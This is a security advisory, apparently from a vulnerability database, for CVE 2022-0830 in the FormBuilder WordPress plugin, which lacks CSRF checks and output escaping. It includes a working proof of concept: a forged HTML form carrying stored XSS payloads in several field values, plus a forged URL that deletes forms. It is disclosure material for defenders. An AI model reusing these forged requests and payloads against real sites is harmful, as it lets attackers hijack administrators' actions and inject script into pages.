FormBuilder <= 1.08 – Stored Cross-Site Scripting via CSRF | CVE 2022-0830

Description

The plugin does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.

Proof of Concept

Edit a form and put XSS payloads:

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST">
      <input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' />
      <input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' />
      <input type="hidden" name="formbuilder[recipient]" value='admin@localhost.orgA New Form"><script>alert(/XSS3/)</script>' />
      <input type="hidden" name="formbuilder[method]" value="POST" />
      <input type="hidden" name="formbuilder[action]" value="" />
      <input type="hidden" name="formbuilder[thankyoutext]" value="" />
      <input type="hidden" name="formbuilder[autoresponse]" value="" />
      <input type="hidden" name="formbuilder[tags]" value="" />
      <input type="hidden" name="Save" value="Save Form" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2